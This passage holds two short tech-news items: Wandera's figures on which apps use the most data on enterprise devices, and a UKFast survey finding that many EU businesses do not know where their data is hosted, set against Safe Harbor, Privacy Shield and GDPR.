Wandera was also able to identify the top 10 apps by data usage on enterprise devices during the last quarter. The majority of data is used by email and Safari at 34 percent followed by Facebook at 10 percent, Instagram at three percent, Twitter at two per cent, and WhatsApp Messenger, Spotify and Snapchat all at one per cent.

Enterprise users have begun to increasingly use their devices for more than just work and while this is a good thing for app developers it could equal an added security threat for their companies.
source

According to a survey by the cloud hosting firm UKFast, nearly half of businesses are clueless as to where their data is located.

To come to its findings, the company surveyed over 300 IT decision makers in EU businesses, with 47 percent of them unaware of where their personal and company data was hosted.

Lawrence Jones, the CEO of UKFast, sees this as a troubling issue for businesses in the UK. Not knowing where their data is stored leaves them unable to reassure their customers of its safety. Also if legal trouble arises, how will these businesses be able to convince a court that their data is entirely secure and not at risk of interference.

UKFast’s survey comes at a time when the European Union is preparing to adopt the Privacy Shield framework which will replace the failed Safe Harbor treaty. When asked about Safe Harbor, 54 percent of the respondents to the survey were unaware that the treaty was no longer valid. Jones believes that the industry as a whole needs to take a stronger stance on how data is controlled and on how businesses educate themselves in regard to how their data is stored.

The EU’s general data protection regulation (GDPR) was designed to achieve just this and it is set to introduce stricter rules in regard to data regulations and higher fines and sanctions for organizations that fail to meet its standards.

UKFast’s data shows that many businesses have not taken proper responsibility for how the sensitive personal data of their customers and employees is handled. According to Jones, the EU should have taken a firmer line on data privacy and protection much sooner.

Privacy Shield is slated to be adopted in June but controversy surrounding how the new framework will protect EU citizens’ data privacy may result in legal action against it.
source